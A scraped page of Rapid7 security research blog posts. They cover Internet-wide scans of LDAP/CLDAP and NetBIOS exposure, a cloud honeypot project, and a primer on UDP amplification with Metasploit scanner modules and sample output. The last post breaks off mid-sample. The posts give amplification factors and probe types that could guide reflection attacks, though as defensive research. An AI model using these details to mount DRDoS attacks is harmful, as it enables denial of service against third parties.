As usual, thanks for reading, and we welcome your feedback, comments, criticisms, ideas or collaboration requests here as a comment or by reaching out to us at research@rapid7.com. Enjoy!

Project Sonar Study of LDAP on the Internet

The topic of today's post is a Rapid7 Project Sonar study of publicly accessible LDAP services on the Internet. This research effort was started in July of this year and various portions of it continue today.  In light of the Shadowserver Foundations's recent announcement regarding…

The topic of today's post is a Rapid7 Project Sonar study of publicly accessible LDAP services on the Internet. This research effort was started in July of this year and various portions of it continue today.  In light of the Shadowserver Foundations's recent announcement regarding the availability relevant reports we thought it would be a good time to make some of our results public. The study was originally intended to be an Internet scan for Connectionless LDAP (CLDAP) which was thought to only be used by Microsoft Active Directory. This protocol uses LDAP over UDP instead of the typical TCP. CLDAP was proposed in RFC 1798 in June of 1995 but its standard was marked as abandoned per RFC 3352 in March of 2003 due to lack of support and implementation. Microsoft uses CLDAP as part of the client's discovery mechanism via LDAP Ping (additional reference). In the early phases of the study it was determined that the toolset could be used to survey LDAP over TCP and so the scope was expanded. In this document the term LDAP will used to interchangeably for both LDAP (TCP) and CLDAP (UDP). The intent of the study was to attempt to answer multiple questions: How prevalent is publicly accessible LDAP on the Internet? The term "publicly accessible" in this case means services that allow connections from and communications with our various scanners. In no case did we test with any form of authentication other than that of an anonymous LDAP bind. Can we identify the remote service and, if so, determine if Microsoft Active Directory is the only product using CLDAP protocol? Would CLDAP be an effective service in DRDoS attacks? Study implementation Like most other UDP services CLDAP will only respond to correctly formatted probes. In our study we performed service discovery using Zmap with a probe file containing a rootDSE request. This request, defined in RFC 4512 Section 5.1, is part of the LDAP protocol standard and is essentially a request for information about the server and its capabilities. The rootDSE request was chosen as the functionality should be present on all LDAP servers and, importantly, it does not require authentication by RFC definition. This reduces the legal risk of the study as no authentication mechanisms needed to be bypassed. During the study it was found that most of the LDAP responses were larger than a single packet and were fragmented in order to traverse the Internet.  Fragment reassembly functionality is not part of the Zmap use case at this time so we followed the scan with another scan against open services using a custom tool that performs a more comprehensive capture of the response. Since the protocol for communicating with Microsoft's LDAP on UDP is pretty much per RFC standard, it would make sense that any tooling that works with LDAP over UDP should also work with LDAP over TCP with minor changes. This turned out to be the case and the study was expanded to the following ports and services: Port/Proto Description 389/tcp Standard LDAP port, depending on product/config it may support STARTTLS 636/tcp LDAP over TLS 3268/tcp Microsoft Active Directory Global Catalog, may support STARTTLS 3269/tcp Microsoft Active Directory Global Catalog over TLS 389/udp Connectionless LDAP implementation for Active Directory We've performed multiple Internet wide scans on these ports as part of the study. Where possible we negotiated TLS or STARTTLS. The results published in this post are based on Internet wide IPv4 scans performed September 14th and 15th of this year. Study results Prevalence The answer to the study's first question is that there are a significant number of publicly accessible LDAP servers on the Internet. Port Responses Decoded as LDAP Percent 389/tcp 300,663 264,536 88.0% 636/tcp 91,842 72,230 78.6% 268/tcp 113,207 96,270 85.0% 269/tcp 30,199 29,668 98.2% 389/**udp** 79,667 78,908 99.0% The percentage of LDAP servers is actually slightly higher than reported. Some of the service responses that did not decode as LDAP were visually identified as fragments of legitimate LDAP responses. Service identification A significant number of services returned information that allowed us to successfully fingerprint them. This fingerprinting capability was added to the Rapid7 Recog tool which is discussed later in this post. In our data set we found that most of the LDAP services were Microsoft Active Directory Controllers (ADC) or Lightweight Directory Services (LDS) (formerly Active Directory Application Mode) Here is the breakdown of ADC and LDS services in the data set. The Samba ADC implementation has been included as well. Port Total LDAP MS ADC % MS LDS % Samba AD % 389/tcp 264,536 117,875 44.6% 4,209 1.6% 1,276 0.5% 636/tcp 72,230 37,848 52.4% 214 0.3% 1,222 1.7% 3268/tcp 96,270 95,057 98.7% 0 0.0% 1,169 1.2% 3269/tcp 29,668 28,470 96.0% 0 0.0% 1,159 3.9% 389/udp 78,908 76,356 96.8% 1,223 1.5% 1,283 1.6% It turns out that it is possible to not only identify the software in most cases, but we can usually identify the host operating system as well. In the case of Microsoft ADC and LDS services, there is almost always enough information to determine the more specific operating system version such as Windows Server 2012 R2. Most of the ADC and LDS services in the data set are running supported versions of the OS. Some are ahead of the curve, some are behind. As a note, Microsoft ended all support for all versions of Windows Server 2003 as of July 14, 2015. Product 389/tcp % 389/udp % Total AD and LDS 122,084 77,579 MS Windows Server 2008 R2 48,050 39.4% 21,309 27.5% MS Windows Server 2012 R2 35,159 28.8% 28,354 36.6% MS Windows Server 2003 15,476 12.7% 12,342 15.9% MS Windows Server 2008 12,307 10.1% 5,750 7.4% MS Windows Server 2012 10,868 8.9% 8,862 11.4% MS Windows Server 2016 224 0.2% 195 0.3% MS Windows Server 2000 0 0.0% 767 1.0% We can also identify other products, just in smaller numbers. The table below contains a few examples selected from a much longer list. Count Product Port 52,429 OpenLDAP OpenLDAP 389/tcp 13,962 OpenLDAP OpenLDAP 636/tcp 9,536 Kerio Connect 636/tcp 2,149 VMware Platform Services Controller 6.0.00 389/tcp 2,118 VMware Platform Services Controller 6.0.00 636/tcp 517 IBM Security Directory Server 6.3 389/tcp 435 Fedora Project Fedora Directory Server 1.0.4 B2007.304.11380 389/tcp 397 IBM Security Directory Server 6.1 389/tcp 248 innovaphone IPVA 636/tcp 154 Sun Microsystems Sun Java System Directory Server 5.2_Patch_6 389/tcp 148 IBM Domino LDAP Server 8.5.30 389/tcp This allows us to answer the study's second question of the ability to identify services. We can successfully do this in many cases though there is a non-trivial number of generic LDAP response returned on 389/tcp. We've also determined that Microsoft ADC and LDS aren't the only services using CLDAP as we found six instances Novel LDAP Agent for eDirectory in the data set. DRDoS utility The specific type of DDoS we are interested in was described by Rapid7 Labs researcher Jon Hart in a recent Rapid7 Community blog post: A distributed, reflected denial of service (DRDoS) attack is a specialized variant of the DDoS attack that typically exploits UDP amplification vulnerabilities.  These are often referred to as volumetric DDoS attacks, a more generic type of DDoS attack that specifically attempts to consume precious network resources. A UDP amplification vulnerability occurs when a UDP service responds with more data or packets than the initial request that elicited the response(s). Combined with IP packet spoofing/forgery, attackers send a large number of spoofed UDP datagrams to UDP endpoints known to be susceptible to UDP amplification using a source address corresponding to the IP address of the ultimate target of the DoS.  In this sense, the forged packets cause the UDP service to "reflect" back at the DoS target. Based on service responses to probes on 389/udp it would appear CLDAP does provide a significant amplification source. The UDP datagram probe that was used in the study was roughly 51 bytes.  Most of the valid LDAP responses without the headers ranged from 1,700 to 3,500 bytes. There were a few outliers in the 5,000 to 17,700 range. The chart below shows the response size distribution with the larger outliers removed. The services returning a 3,000 bytes in response data are providing a 58x bandwidth amplification factor. We didn't track the number of packets returned but using almost any reasonable MTU value will result in a packet amplification factor of 2x or 3x. Based on this finding CLDAP is effective as a DRDoS amplification source. Its utility as such will primarily be limited by how prevalent public access to the service remains over time. Study success When the study completed we were able to answer the study's primary questions. LDAP is fairly prevalent on the public Internet.  We can identify the software providing most of the LDAP services.  We were able to determine that Microsoft ADC and LDS weren't the only software providing CLDAP services though the Internet presence of others was statistically insignificant.  We were also able to determine that CLDAP could be used in DRDoS attacks if significant numbers of services remain available on the public Internet. Community contributions Rapid7 is a strong supporter of open source.  In addition to well known projects like Metasploit we also open source some of our tools and utilities. Two such tools were used in this study and have been enhanced as a result of it. Recog The initial scans provided us with a corpus of responses that we could use for generating product fingerprints. Reviewing the responses proved to be time consuming but very fruitful. The result was that Rapid7's open source fingerprinting tool Recog was updated to support LDAP fingerprints and an initial 55 fingerprints were added. Part of the update also included adding support to Recog for building fingerprints and examples with binary strings. This means that server responses can be handed directly to Recog without being processed or stripped if the fingerprint was constructed to support it. This functionality is available in the public Recog GitHub repo and gems as of version 2.0.22 which was released on August 25, 2016. DAP As part of our study process we often run the scan results through Rapid7's open source Data Analysis Pipeline (DAP) tool for data enrichment. This generally includes adding geoIP tagging and protocol decoding if appropriate. DAP can also leverage Recog's version detection for determining the remote service's product, version, and/or operating system. Part of this study included adding support for decoding LDAP protocol responses to DAP. It will now decode a properly formatted LDAP response into a nested JSON structure. This functionality is available in the public DAP GitHub repo and gems as of version 0.0.10 which was released on August 2, 2016. Example In the example below DAP is handed JSON formatted data that contains an IP, a base64 encoded server response, the port, and protocol. It returned additional data including version detection (dap.recog..), decoded LDAP response (data.SearchResultEntry…., data.SearchResultDone), and geoIP information (ip.country…, ip.latitude, ip.longitude). At the end the jq utility is used to improve the readability of the result. Command bash echo '{"ip": "66.209.xxx.xxx", "data": "MDACAQdkKwQAMCcwJQQLb2JqZWN0Q2xhc3MxFgQDdG9wBA9PcGVuTERBUHJvb3REU0UwDAIBB2UHCgEABAAEAA==", "port": 389, "proto": "tcp"}' | \ bin/dap json + \ transform data=base64decode + annotate data=length + \ recog data=ldap.search_result + \ decode_ldap_search_result data + \ remove data + geo_ip ip + \ geo_ip_org ip + json | jq Result { "ip": "66.209.xxx.xxx", "port": 389, "proto": "tcp", "data.length": 64, "data.recog.matched": "OpenLDAP", "data.recog.service.vendor": "OpenLDAP", "data.recog.service.product": "OpenLDAP", "data.SearchResultEntry": { "objectName": "", "PartialAttributes": { "objectClass": [ "top", "OpenLDAProotDSE" ] } }, "data.SearchResultDone": { "resultCode": 0, "resultDesc": "success", "resultMatchedDN": "", "resultdiagMessage": "" }, "ip.country_code": "US", "ip.country_code3": "USA", "ip.country_name": "United States", "ip.latitude": "36.xx", "ip.longitude": "-115.xxxxxxxxx" } This is one of the simpler examples. The responses from Active Directory Controllers contain significantly more information. Final thoughts The results from the study were able to successfully answer the original questions but prompted new ones. Fortunately there is quite a bit of information that remains to be extracted from the data that we have. It is likely that there will be multiple future blog posts on the data, the software and versions identified in it, and information about the individual hosts that can be extracted from it. Unlike other studies that Project Sonar publishes on Scans.IO, we have not yet made these data sets available. For those of you that are concerned that your network may be exposing LDAP services I recommend the following: If your organization is a service provider or a company with assigned ASNs you can sign up for free Shadowserver reports. The Shadowserver Foundation scans the Internet for certain services of concern, such as those that could be used in DDoS, and will provide regular reports on these to network owners. Last week they announced support for discovering and reporting on CLDAP. Use an external service, such as the Rapid7 Perimeter Scanning Service, or an externally hosted scan engine to perform scans of your Internet accessible IP space. Ensure that the ports listed above are included in the scan template. This will provide a more accurate picture of what your organization is exposing to the Internet than that provided by an internally hosted scanner. Review firewall rules to determine if any are overly permissive. As always, if you are interesting in having Sonar perform additional relevant studies, have interests in related research, or if you have questions, we welcome your comments here as well as by reaching out to us at research@rapid7.com.

[Cloud Security Research] Cross-Cloud Adversary Analytics

Introducing Project Heisenberg CloudProject Heisenberg Cloud is a Rapid7 Labs research project with a singular purpose: understand what attackers, researchers and organizations are doing in, across and against cloud environments. This research is based on data collected from a new, Rapid7-developed honeypot framework called Heisenberg…

Introducing Project Heisenberg CloudProject Heisenberg Cloud is a Rapid7 Labs research project with a singular purpose: understand what attackers, researchers and organizations are doing in, across and against cloud environments. This research is based on data collected from a new, Rapid7-developed honeypot framework called Heisenberg along with internet reconnaissance data from Rapid7's Project Sonar.Internet-scale reconnaissance with cloud-inspired automationHeisenberg honeypots are a modern take on the seminal attacker detection tool. Each Heisenberg node is a lightweight, highly configurable agent that is centrally deployed using well-tested tools, such as terraform, and controlled from a central administration portal. Virtually any honeypot code can be deployed to Heisenberg agents and all agents send back full packet captures for post-interaction analysis.One of the main goals of Heisenberg it to understand attacker methodology. All interaction and packet capture data is synchronized to a central collector and all real-time logs are fed directly into Rapid7's Logentries for live monitoring and historical data mining.Insights into cloud configs and attacker methodologyRapid7 and Microsoft deployed multiple Heisenberg honeypots in every "zone" of six major cloud providers: Amazon, Azure, Digital Ocean, Rackspace, Google and Softlayer, and examined the service diversity in each of these environments, the type of connection attackers, researchers and organizations are initiating within, against and across these environments.To paint a picture of the services offered in each cloud provider, the research teams used Sonar data collected during Rapid7's 2016 National Exposure study. Some highlights include:The six cloud providers in our study make up nearly 15% of available IPv4 addresses on the internet.22% of Softlayer nodes expose database services (MySQL & SQL Server) directly to the internet.Web services are prolific, with 53-80 of nodes in each provider exposing some type of web service.Digital Ocean and Google nodes expose shell (Telnet & SSH) services at a much higher rate - 86% and 74%, respectively - than the other four cloud providers in this study.A wide range of attacks were detected, including ShellShock, SQL Injection, PHP webshell injection and credentials attacks against ssh, Telnet and remote framebuffer (e.g. VNC, RDP & Citrix).Our honeypots caught "data mashup" businesses attempting to use the cloud to mask illegal content scraping activity.Read MoreFor more detail on our initial findings with Heisenberg Cloud, please click here to download our report or here for slides from our recent UNITED conference presentation. AcknowledgementsWe would like to thank Microsoft and Amazon for engaging with us through the initial stages of this research effort, and as indicated above, we hope they, and other cloud hosting providers will continue to do so as we move forward with the project.

NCSAM: Understanding UDP Amplification Vulnerabilities Through Rapid7 Research

October is National Cyber Security Awareness month and Rapid7 is taking this time to celebrate security research. This year, NCSAM coincides with new legal protections for security research under the DMCA and the 30th anniversary of the CFAA - a problematic law that hinders beneficial…

October is National Cyber Security Awareness month and Rapid7 is taking this time to celebrate security research. This year, NCSAM coincides with new legal protections for security research under the DMCA and the 30th anniversary of the CFAA - a problematic law that hinders beneficial security research. Throughout the month, we will be sharing content that enhances understanding of what independent security research is, how it benefits the digital ecosystem, and the challenges that researchers face. When we began brainstorming ideas for NCSAM, I suggested something related to distributed denial of service (DDoS) attacks, specifically with a focus on the UDP amplification vulnerabilities that are typically abused as part of these attacks.  Rarely a day goes by lately in the infosec world where you don't hear about DDoS attacks crushing the Internet presence of various companies for a few hours, days, weeks, or more.  Even as I wrote this, DDoS attacks are on the front page of many major news outlets. A variety of services that I needed to write this very blog post were down because of DDoS, and I even heard DDoS discussed on the only radio station I am able to get where I live. Timely. What follows is a brief primer on and a look at what resources Rapid7 provides for further understanding UDP amplification attacks. Background A denial of service (DoS) vulnerability is about as simple as it sounds -- this vulnerability exists when it is possible to deny, prevent or in some way hinder access to a particular type of service.  Abusing a DoS vulnerability usually involves an attack that consumes precious compute or network resources such as CPU, memory, disk, and network bandwidth. A DDoS attack is just a DoS attack on a larger scale, often using the resources of compromised devices on the Internet or other unwitting systems to participate in the attack. A distributed, reflected denial of service (DRDoS) attack is a specialized variant of the DDoS attack that typically exploits UDP amplification vulnerabilities.  These are often referred to as volumetric DDoS attacks, a more generic type of DDoS attack that specifically attempts to consume precious network resources. A UDP amplification vulnerability occurs when a UDP service responds with more data or packets than the initial request that elicited the response(s). Combined with IP packet spoofing/forgery, attackers send a large number of spoofed UDP datagrams to UDP endpoints known to be susceptible to UDP amplification using a source address corresponding to the IP address of the ultimate target of the DoS.  In this sense, the forged packets cause the UDP service to "reflect" back at the DoS target. The exact impact of the attack is a function of how many systems participate in the attack and their available network resources, the network resources available to the target, as well as the bandwidth and packet amplification factors of the UDP service in question. A UDP service that returns 100 bytes of UDP payload in response to a 1-byte request is said to have a 100x bandwidth amplification factor.  A UDP service that returns 5 UDP packets in response to 1 request is said to have a 5x packet amplification factor. Oftentimes a ratio is used in place of a factor. For example, a 5x amplification factor can also be said to have a 1:5 amplification ratio. For more information, consider the following resources: US-CERT's alert on UDP-Based Amplification Attacks The Spoofer project from the Center for Applied Internet Data Analysis (CAIDA) Sonar UDP Studies Rapid7's Project Sonar has been performing a variety of UDP scans on a monthly basis and uploading the results to scans.io for consumption by the larger infosec/network community for nearly three years. Infosec practitioners can use this raw scan data to research a variety of aspects related to UDP amplification vulnerabilities, including geographic/sector specific patterns, amplification factors, etc.  There are, however, some caveats: Although we do not currently have studies for all UDP services with amplification vulnerabilities, we have a fair number and are in the process of adding more. Not all of these studies specifically cover the UDP amplification vulnerabilities for the given service.  Some happen to use other probe types more likely to elicit a response.  In these cases, the existence of a response for a given IP simply means that it responded to our probe for that service, is likely running that service in question, but doesn't necessarily imply that the IP in question is harboring a UDP amplification vulnerability. Our current usage of zmap is such that we will only record the first UDP packet seen in response to our probe.  So, if a UDP service happens to suffer from a packet-based UDP amplification vulnerability, the Sonar data alone may not show the true extent. Currently, Rapid7's Project Sonar has coverage for a variety of  UDP services that happen to be susceptible to UDP amplification attacks. Dennis Rand, a security researcher from Denmark, recently reached out to us asking for us to provide regular studies of the qotd (17/UDP), chargen (19/UDP) and RIPv1 services (520/UDP). When discussing his use cases for these and the other existing Sonar studies, Dennis had the following to add: "I've been using the dataset from Rapid7 UDP Sonar for various research projects as a baseline and core part of the dataset in my research has been amazing. This data could be used by any ISPs out there to detect if they are potentially being part of the problem.  A simple task could be to setup a script that would pull the lists every month and the compare it against previous months, if at some point the numbers go way up, this could be an indication that you might have opened up for something you should not, or at least be aware of this fact in you internal risk assessment. Also it is awesome to work with people who are first of doing this for free, at least seen from my perspective, but still being so open to helping out in the research, like adding new service to the dataset help me to span even wider in my research projects." For each of the studies described below, the data provided on scans.io is gzip-compressed CSV with a header indicating the respective field values, which are, for every host that responded, the timestamp in seconds since the UNIX epoch, the source address and port of the response, the destination address and port (where Sonar does its scanning from), the IP ID, the TTL, and the hex-encoded UDP response payload, if any.  Precisely how to decode the data for each of the studies listed below is an exercise currently left for the reader that may be addressed in future documentation, but for now the descriptions below in combination with Rapid7's dap should be sufficient. DNS (53/UDP) This study sends a DNS query to 53/UDP for the VERSION.BIND text record in the CHAOS class. In some situations this will return the version of ISC BIND that the DNS server is running, and in others it will just return an error. Data can be found here in files with the -dns-53.csv.gz suffix.  In the most recent run of this study on 10/03/2016, there were 7,963,280 endpoints that responded. NTP (123/UDP) There are two variants of this study. The first sends an NTP version 2 MON_GETLIST_1 request, which will return a list of all recently connected NTP peers, generally up to 6 per packet with additional peers sent in subsequent UDP responses. Responses for this study can be found here in files with the ntpmonlist-123.csv.gz suffix.  This probe used in this study is the same as one frequently used in UDP amplification attacks against NTP.  In the most recent run of this study on 10/03/2016, 1,194,146 endpoints responded. The second variant of this study sends an NTP version 2 READVAR request and will return all of the internal variables known to the NTP process, which typically includes things like software version, information about the underlying OS or hardware, and data specific to NTP's time keeping. The responses can be found here in files with the ntpreadvar-123.csv.gz suffix. In the most recent run of this study on 10/03/2016, 2,245,681 endpoints responded. Other UDP amplification attacks in NTP that continue to enable DDoS attacks are described in R7-2014-12. NBNS (137/UDP) This study has been described in greater detail here, but the summary is that this study sends an NBNS name request.  Most endpoints speaking NBNS will return a wealth of metadata about the node/service in question, including system and group/domain names and MAC addresses.  This is the same probe that is frequently used in UDP amplification attacks against NBNS.  The responses can be found here in files with the -netbios-137.csv.gz suffix.  In the most recent run of this study on 10/03/2016, 1,768,634 endpoints responded. SSDP/UPnP (1900/UDP) This study sends an SSDP request that will discover the rootdevice service of most UPnP/SSDP-enabled endpoints.  The responses can be found here in files with the -upnp-1900.csv.gzsuffix.  UDP amplification attacks against SSDP/UPnP often involve a similar request but for all services, often resulting in a 10x packet amplification and a 40x bandwidth amplification.  In the most recent run of this study on 10/03/2016, 4,842,639 endpoints responded. Portmap (111/UDP) This study sends an RPC DUMP request to version 2 of the portmap service.  Most endpoints exposing 111/UDP that are the portmap RPC service will return a list of all of the RPC services available on this node.  The responses can be found here in files with the -portmap-111.csv.gz suffix.  There are numerous ways to exploit UDP amplification vulnerabilities in portmap, including the same one used in the Sonar study, a portmap version 3 variant that is often more voluminous, and a portmap version 4 GETSTAT request.  In the most recent run of this study on 10/03/2016, 2,836,710 endpoints responded. Quote of the Day (17/UDP) The qotd service is essentially the UNIX fortune bound to a UDP socket, returning quotes/adages in response to any incoming 17/UDP datagram.  Sonar's version of this study sends an empty UDP datagram to the port and records any responses, which is believed to be similar to the variant used in the UDP amplification attacks.  The responses can be found here in files with the -qotd-17.csv.gzsuffix.  In the most recent run of this newly added study on 10/21/2016, a mere 2,949 endpoints responded. Character Generator (19/UDP) The chargen service is a service from a time when the Internet was a wholly different place.  The UDP variant of chargen will send a random number bytes in response to any datagram arriving on 19/UDP.  While most implementations stick to purely ASCII strings of random lengths between 0 and 512, some are much chattier, spewing MTU-filling gibberish, packet after packet.  The responses can be found here in files with the -chargen-19.csv.gz suffix.  In the most recent run of this newly added study on 10/21/2016, only 3,791 endpoints responded. RIPv1 (520/UDP) UDP amplification attacks against the Routing Information Protocol version 1 (RIPv1) involve sending a specially crafted request that will result in RIP responding with 20 bytes of data for every route it knows about, with up to 25 routes per response for a maximum response size of 504 bytes, but RIP instances with more than 25 routes will split responses over multiple packets, adding packet amplification pains to the mix.  The responses can be found here in files with the -ripv1-520.csv.gzsuffix.  In the most recent run of this newly added study on 10/21/2016, 17,428 endpoints responded. metasploit modules Rapid7's Metasploit has coverage for a variety of these UDP amplification vulnerabilties built into "scanner" modules available to both the base metasploit-framework as well as the Metasploit community and Professional editions via: auxiliary/scanner/chargen/chargen_probe: this module probes endpoints for the chargen service, which suffers from a UDP amplification vulnerability inherent in its design. auxiliary/scanner/dns/dns_amp: in its default mode, this module will send an ANY query for isc.org to the target endpoints, which is similar to the query used while abusing DNS as part of DRDos attacks. auxiliary/scanner/ntp/ntp_monlist: this module sends the NTP MON_GETLIST request which will return all configured/connected NTP peers from the NTP endpoint in question.  This behavior can be abused as part of UDP amplification attacks and is described in more detail in US-CERT TA14-031a and CVE-2013-5211. auxiliary/scanner/ntp/ntp_readvar: this module sends the NTP READVAR request, the response to which can be used as part of UDP amplification attacks in certain situations. auxiliary/scanner/ntp/ntp_peer_list_dos: utilizes the NTP PEER_LIST request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12 auxiliary/scanner/ntp/ntp_peer_list_sum_dos: utilizes the NTP PEER_LIST_SUM request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12 auxiliary/scanner/ntp/ntp_req_nonce_dos: utilizes the NTP REQ_NONCE request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12 auxiliary/scanner/ntp/ntp_reslist_dos utilizes the NTP GET_RESTRICT request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12 auxiliary/scanner/ntp/ntp_unsettrap_dos: utilizes the NTP UNSETTRAP request to test the NTP endpoint for the UDP amplification vulnerability described in R7-2014-12 auxiliary/scanner/portmap/portmap_amp: this module has the ability to send three different portmap requests similar to those described previously, each of which has the potential to be abused for UDP amplification purposes. auxiliary/scanner/upnp/ssdp_amp: this module has the ability to send two different M-SEARCH requests that demonstrate UDP amplification vulnerabilities inherent in SSDP. Each of these modules uses the Msf::Auxiliary::UDPScanner mixin to support scanning multiple hosts at the same time. Most send probes and analyze the responses with the Msf::Auxiliary::DRDoS mixin to automatically calculate any amplification based on a high level analysis of the request/response datagram(s). Here is an example run of auxiliary/scanner/ntp/ntp_monlist: msf auxiliary(ntp_monlist) > run [+] 192.168.33.127:123 NTP monlist request permitted (5 entries) [+] 192.168.32.139:123 NTP monlist request permitted (4 entries) [+] 192.168.32.139:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): No packet amplification and a 37x, 288-byte bandwidth amplification [+] 192.168.33.127:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): No packet amplification and a 46x, 360-byte bandwidth amplification [+] 192.168.32.138:123 NTP monlist request permitted (31 entries) [+] 192.168.33.128:123 NTP monlist request permitted (23 entries) [+] 192.168.32.138:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 6x packet amplification and a 285x, 2272-byte bandwidth amplification [+] 192.168.33.128:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 4x packet amplification and a 211x, 1680-byte bandwidth amplification [+] 192.168.33.200:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 2x packet amplification and a 2x, 8-byte bandwidth amplification [*] Scanned 256 of 512 hosts (50% complete) [+] 192.168.33.251:123 NTP monlist request permitted (10 entries) [+] 192.168.33.251:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 2x packet amplification and a 92x, 728-byte bandwidth amplification [+] 192.168.33.254:123 - Vulnerable to NTP Mode 7 monlist DRDoS (CVE-2013-5211): 2x packet amplification and a 2x, 8-byte bandwidth amplification [*] Scanned 512 of 512 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ntp_monlist) > There is also the auxiliary/scanner/udp/udp_amplification module recently added as part of metasploit-framework PR 7489 that is designed to help explore UDP amplification vulnerabilities and audit for the presence of existing ones. Nexpose coverage Rapid7's Nexpose product has coverage for all of the ntp vulnerabilities described above and in R7-2014-12, along with: netbios-nbstat-amplification dns-amplification chargen-amplification qotd-amplification quake-amplification steam-amplification upnp-ssdp-amplification snmp-amplification Additional information about Nexpose's capabilities with regards to UDP amplification vulnerabilities can be found here. Future Research UDP amplification vulnerabilities have been lingering since the publication of RFC 768 in 1980, but only in the last couple of years have they really become a problem.  Whether current and historical efforts to mitigate the impact that attacks involving UDP amplification have been effective is certainly debatable.  Recent events have shown that only very well fortified assets can survive DDoS attacks and UDP amplification still plays a significant role.  It is our hope that the open dissemination of active scan data through projects like Sonar and the availability of tools for detecting the presence of this class of vulnerability will serve as a valuable tool in the fight against DDoS. If you are interested in collaborating on Metasploit modules for detecting other UDP amplification vulnerabilities, submit a Metasploit PR. If you are interesting in having Sonar perform additional relevant studies, have interests in related research, or if you have questions, we welcome your comments here as well as by reaching out to us at research@rapid7.com. Enjoy!

Sonar NetBIOS Name Service Study

For the past several years, Rapid7's Project Sonar has been performing studies that explore the exposure of the NetBIOS name service on the public IPv4 Internet.  This post serves to describe the particulars behind the study and provide tools and data for future research in…

For the past several years, Rapid7's Project Sonar has been performing studies that explore the exposure of the NetBIOS name service on the public IPv4 Internet.  This post serves to describe the particulars behind the study and provide tools and data for future research in this area. Protocol Overview Originally conceived in the early 1980s, NetBIOS is a collection of services that allows applications running on different nodes to communicate over a network.  Over time, NetBIOS was adapted to operate on various network types including IBM's PC Network, token ring, Microsoft's MS-Net, Novell NetWare IPX/SPX, and ultimately TCP/IP. For purposes of this document, we will be discussing NetBIOS over TCP/IP (NBT), documented in RFC 1001 and RFC 1002. NBT is comprised of three services: A name service for name resolution and registration (137/UDP and 137/TCP) A datagram service for connectionless communication (138/UDP) A session service for session-oriented communication (139/TCP) The UDP variant of the NetBIOS over TCP/IP Name service on 137/UDP, NBNS, sometimes referred to as WINS (Windows Internet Name Service), is the focus of this study.  NBNS provides services related to NetBIOS names for NetBIOS-enabled nodes and applications.  The core functionality of NBNS includes name querying and registration capabilities and is similar in functionality and on-the-wire format to DNS but with several NetBIOS/NBNS specific details. Although NetBIOS (and, in turn, NBNS) are predominantly spoken by Microsoft Windows systems, it is also very common to find this service active on OS X systems (netbiosd and/or Samba), Linux/UNIX systems (Samba) and all manner of printers, scanners, multi-function devices, storage devices, etc.  Fire up wireshark or tcpdump on nearly any network that contains or regularly services Windows systems and you will almost certainly see NBNS traffic everywhere: The history of security issues with NBNS reads much like that of DNS.  Unauthenticated and communicated over a connectionless medium, some attacks against NBNS include: Information disclosure relating to generally internal/private names and addresses Name spoofing, interception, and cache poisoning. While not exhaustive, some notable security issues relating to NBNS include: Abusing NBNS to attack the Web Proxy Auto-Discovery (WPAD) feature of Microsoft Windows to perform man-in-the-middle attacks, resulting in [MS09-008](https://technet.microsoft.com/library/ security/ms09-008)/CVE-2009-0094. Hot Potato, which leveraged WPAD abuse via NBNS in combination with other techniques to achieve privilege escalation on Windows 7 and above. BadTunnel, which utilized NetBIOS/NBNS in new ways to perform man-in-the-middle attacks against target Windows systems, ultimately resulting in Microsoft issuing MS16-077. Abusing NBNS to perform amplification attacks as seen during DDoS attacks as warned by US-CERT's TA14-017a. Study Overview Project Sonar's study of NBNS on 137/UDP has been running for a little over two years as of the publication of this document.  For the first year the study ran once per week, but shortly thereafter it was changed to run once per month along with the other UDP studies in an effort to reduce the signal to noise ratio. The study uses a single, static, 50-byte NetBIOS "node status request" (NBSTAT) probe with a wildcard (*) scope that will return all configured names for the target NetBIOS-enabled node.  A name in this case is in reference to a particular capability a NetBIOS-enabled node has -- for example, this could (and often does) include the configured host name of the system, the workgroup/domain that it belongs to, and more.  In some cases, the presence of a particular type of name can be an indicator of the types of services a node provides.  For a more complete list of the types of names that can be seen in NBNS, see Microsoft's documentation on NetBIOS suffixes. The probe used by Sonar is identical to the probe used by zmap and the probe used by Nmap.  A Wireshark-decoded sample of this probe can be seen below: This probe is sent to all public IPv4 addresses, excluding any networks that have requested removal from Sonar's studies, leaving ~3.6b possible target addresses for Sonar.  All responses, NBNS or otherwise, are saved.  Responses that appear to be legitimate NBNS responses are decoded for further analysis. An example response from a Windows 2012 system: As a bonus for reconnaissance efforts, RFC 1002 also describes a field included at the end of the node status response that includes statistics about the NetBIOS service on the target node, and one field within here, the "Unit ID", frequently contains the ethernet or other MAC address. NetBIOS, and in particular NBNS, falls into the same bucket that many other services fall into -- they have no sufficiently valid business reason for being exposed live on the public Internet.  Lacking authentication and riding on top of a connectionless protocol, NBNS has a history of vulnerabilities and effective attacks that can put systems and networks exposing/using this service at risk.  Depending on your level of paranoia, the information disclosed by a listening NBNS endpoint may also constitute a risk. These reasons, combined with a simple, non-intrusive way of identifying NBNS endpoints on the public IPv4 Internet is why Rapid7's Project Sonar decided to undertake this study. Data, Tools and Future Research As part of Rapid7's Project Sonar, all data collected by this NBNS study is shared with the larger security community thanks to scans.io.  The past two years worth of the NBNS study's data can be found here with the -netbios-137.csv.gz  suffix.  The data is stored as GZIP-compressed CSV, each row of the CSV containing the metadata for the response elicited by the NBNS probe -- timestamp, source and destination IPv4 address, port, IP ID, TTL and, most importantly, the NBNS response (hex encoded). There are numerous ways one could start analyzing this data, but internally we do much of our first-pass analysis using GNU parallel and Rapid7's dap.  Below is an example command you could run to start your own analysis of this data.  It utilizes dap to parse the CSV, decode the NBNS response and return the data in a more friendly JSON format: pigz -dc ~/Downloads/20160801-netbios-137.csv.gz | parallel --gnu --pipe "dap csv + select 2 8 + rename 2=ip 8=data + transform data=hexdecode + decode_netbios_status_reply data + remove data + json" As an example of some of the output you might get from this, anonymized for now: {"ip":"192.168.0.1","data.netbios_names":"MYSTORAGE:00:U WORKGROUP:00:G MYSTORAGE:20:U WORKGROUP:1d:U 